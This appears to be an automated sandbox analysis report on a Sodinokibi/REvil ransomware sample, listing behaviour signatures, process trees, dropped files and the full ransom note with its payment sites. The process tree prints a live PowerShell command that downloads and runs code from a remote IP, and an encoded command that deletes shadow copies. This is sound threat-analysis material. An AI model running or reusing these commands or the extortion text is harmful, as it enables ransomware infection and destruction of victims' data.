Analysis

  • max time kernel
    141s
  • resource
    win7v191014
  • submitted
    03-01-2020 16:10

General

  • Target

    3yFsXBJM.bat

  • Sample

    200103-5bbywmjlze

  • SHA256

    504dec8fcbb3fb46037b86882c6760e22e3e0ebafdbc4dca3df3101102dcdf15

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/3yFsXBJM

Extracted

Language
ps1
Source

Extracted

Path

C:\nyu2d5f75-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension nyu2d5f75. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/03460156E7C74522 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/03460156E7C74522 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: W+xuOQU2B0AN6mWjpXEfKmzJjQjubbiVoHZI06/Tm5OTxKq75pli+n2JALuxlqbl fzh8n2RUnJO80jm4j/qFC2HnxbV8Wa4TWHL9DgDPEFXnlX0A+lodcgWb6MaLXvAw CXgAHF+jEz9K/tS68qtJ8xqznDrHUFFH+2WonlP9C6jO6JmyKvrA9uuJZ2We0bVY 7iqp63N2LGOu2/aAiV7dW9x768zobYRrh1YSHvCM2le+bK9Zk6AcFxzVX9fWQ31X 5Kdrp4dMayjjsIsR8cJ6+qjD9Jn4gkNCV1lZSBlxfitYde1wlVe/JgKozE0o+AqD 8gxZI2N4wsuhhkq+0wytZTVH4MA3ASMSLuyc96XFicDwgwDxSEPEnDgJdV84GWEr 2BwxE8FbR9QLiq82ohxl4YyZ1fwnID6FLEwWcMi+Rrll6chHT//j7VvHn2DHoAaK 8krzRRshHMX/U1A9uo2fcJR90sfJTEnD6ca3ay789XINflFApobaMCucke3s4YOE 7qG5EHuEBEidRzOVJBajkB2nAZX7XGihXILQntnBecplqftk3tun90Vxkb1Jx2mk 94fnJ/PVVmJgaMACLSlfCGYf7S0fqETszmXvBjp3Oh2H+ME7usT6tRGYMaysP+nE KQmSECPVH7qYts1jGA3OiB1Y7ewxMV74AJg2YNxztLNW3iV7ZiNF80L0MNpm6PtS UgvUN2kMAeR+H1sFJrdqoM6kmylqb8JqNMoztGSY6DP1iaxHwNJYPfK7t/SsY5Jo 0InkPyOQR3eOVny4jjz0QUt4wTSsugUqGgHT9P8e9Ba4IAtqh9hpErRRHL8/cjex P8ur8iTbOozP59F+2VTkZ1DtLXLspJoEO1+veTztcl90wGsDveWr2UUdHODdgSn8 PpzdvD99aJBre49pKtwCBbv/5GFkBjrN/co2GEmMNkE1PXc1B5oKidWqkmiZU6pG hComblfwAzQaH7zi9D/2omFcRXM37zNVQW7DxE4clfN67dtgBW2Hyfh/pJ2mHBO6 5xCuKKtXxdq++eSjVD6NNJ2UiZ1HLJFL6U8GTJkr4wZkEO1452kAxikK9scGZvya PP3PzbRm1V8WSz88Za+3ZtYWvH+kYCDau/19CaYJCzWlJDBLVqmRmsixRqsZclX+ cL8vr0Hgoxq9i22hvE0H++bo Extension name: nyu2d5f75 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/03460156E7C74522

http://decryptor.top/03460156E7C74522

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Drops file in Program Files directory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\3yFsXBJM.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1120
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3yFsXBJM');Invoke-XWICUOJBYLA;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Discovering connected drives
      • Drops file in Program Files directory
      PID:1084
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1752
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1712

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms